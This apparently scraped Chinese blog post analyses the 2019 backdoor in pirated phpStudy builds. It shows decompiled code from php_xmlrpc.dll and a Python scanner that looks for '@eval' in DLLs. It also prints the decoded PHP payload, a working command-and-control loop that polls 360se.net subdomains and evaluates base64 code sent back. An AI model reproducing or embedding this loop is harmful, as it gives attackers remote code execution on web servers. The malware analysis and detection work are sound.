2019關於phpstudy軟件後門簡單分析

2019.9.20得知非官網的一些下載站中的phpstudy版本存在後門文件   說是官網下的就沒有後門php

 

 

 

 

 

 

 

 

20號出現的新聞 今天phpstudy官網21號又更新一波 不太好說這是什麼操做哦 欲蓋彌彰?web

 

 

 

 

 

很開心的說 我之前的虛擬機裝的應該是有後門版本(任何文件我歷來都是官網下文件)   用chamd5的檢測pyshell

 

 

 

哎~~學個php都被搞哦  跟着大佬團隊文章也動手找找後門把socket

chamd5團隊老哥發現是php_xmlrpc.dll中的問題 直接站人家肩膀把  看看這個dlltcp

 

 

 

 

 

 

php_xmlrpc.dll @eval函數函數

.data:1000DE98編碼

 

 

gzuncompress函數解密執行payload 之前webshell大馬免殺常常用的函數- -spa

 

 

 

 

 

 .data:1000DE98 函數sub_10003490.net

 

 

 

145-177行:3d

    while ( 1 )
    {
      if ( *(_DWORD *)v13 == 39 )
      {
        v10[v12] = 92;
        v43[v12 + 1] = *v11;
        v12 += 2;
        v13 += 8;
      }
      else
      {
        v10[v12++] = *v11;
        v13 += 4;
      }
      v11 += 4;
      if ( (signed int)v11 >= (signed int)asc_1000C66C )
        break;
      v10 = v43;
    }
    spprintf(&v43, 0, a_evalSS, aGzuncompress, v43);
    v24 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4);
    v25 = *(_DWORD *)(v24 + 296);
    *(_DWORD *)(v24 + 296) = &v33;
    v40 = v25;
    v26 = setjmp3(&v33, 0);
    v27 = v40;
    if ( v26 )
    {
      v28 = a3;
      *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v40;
    }
    else
    {

 

 

 這裏@eval    gzuncompress('%s')進行拼接,調用gzuncompress方法解密執行payload,之前webshell大馬免殺常常用的函數,上面也看到了函數地址

而gzuncompress解密前的代碼是這裏的v43

 

 

 

 

 

下面是zend_eval_string處執行v43處gzuncompress編碼的代碼

 

 

 

 

    }
    else
    {
      v28 = a3;
      zend_eval_string(v43, 0, &byte_10011B34, a3);
    }
    *(_DWORD *)(*(_DWORD *)(*v28 + 4 * executor_globals_id - 4) + 296) = v27;
    if ( dword_1000C010 < 3600 )
      dword_1000C010 += 3600;
    ftime(&dword_10011D50);
  }

 

 

 v43處執行的代碼經過解碼:

@ini_set("display_errors","0");
error_reporting(0);
$h = $_SERVER['HTTP_HOST'];
$p = $_SERVER['SERVER_PORT'];
$fp = fsockopen($h, $p, $errno, $errstr, 5);
if (!$fp) {
} else {
    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";
    $out .= "Host: {$h}\r\n";
    $out .= "Accept-Encoding: compress,gzip\r\n";
    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);
    fclose($fp);
}

 

 

 

拼接後v43後解密的代碼 明顯的fsockopen通訊 反彈後門到360se.net的20123端口

@ini_set("display_errors","0");
error_reporting(0);
function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){
    $result = "";
  $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10); 
  if( !$handle ){
    $handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
    if( !$handle ){
        return "err";
    }
  }
  fwrite($handle, $sendMsg."\n");
    while(!feof($handle)){
        stream_set_timeout($handle, 2);
        $result .= fread($handle, 1024);
        $info = stream_get_meta_data($handle);
        if ($info['timed_out']) {
          break;
        }
     }
  fclose($handle); 
  return $result; 
}

$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("20123","40125","8080","80","53");
$n = false;
do {
    $n = false;
    foreach ($ds as $d){
        $b = false;
        foreach ($ps as $p){
            $result = tcpGet($i,$d.".360se.net",$p); 
            if ($result != "err"){
                $b =true;
                break;
            }
        }
        if ($b)break;
    }
    $info = explode("<^>",$result);
    if (count($info)==4){
        if (strpos($info[3],"/*Onemore*/") !== false){
            $info[3] = str_replace("/*Onemore*/","",$info[3]);
            $n=true;
        }
        @eval(base64_decode($info[3]));
    }
}while($n);

 

 

 

 

 

檢查腳本 來自chamd5團隊腳本,在phpstudy目錄下執行便可遞歸檢查

 

# -*- coding:utf8 -*-
__author__='pcat@chamd5.org'
__blog__='http://pcat.cc'

import os
import string
import re


def strings(file) :
    chars = string.printable[:94]
    shortestReturnChar = 4
    regExp = '[%s]{%d,}' % (chars, shortestReturnChar)
    pattern = re.compile(regExp)
    with open(file, 'rb') as f:
        return pattern.findall(f.read())


def grep(lines,pattern):
    for line in lines:
        if pattern in line:
            yield line


def pcheck(filename):
    # trojan feature
    trojan='@eval'
    # just check dll file
    if filename.endswith('.dll'):        
        lines=strings(filename)
        try:
            grep(lines,trojan).next()
        except:
            return
        print '=== {0} ==='.format(filename)
        for line in grep(lines,trojan):
            print line
    pass


def foo():
    # . stand for current directory
    for path, dirs, files in os.walk(".", topdown=False):
        for name in files:
            pcheck(os.path.join(path, name))
        for name in dirs:
            pcheck(os.path.join(path, name))
    pass


if __name__ == '__main__':
    foo()

 

 

 

 

 

本身斟酌哦 太菜了呢學個php都給人家當雞

相關文章
相關標籤/搜索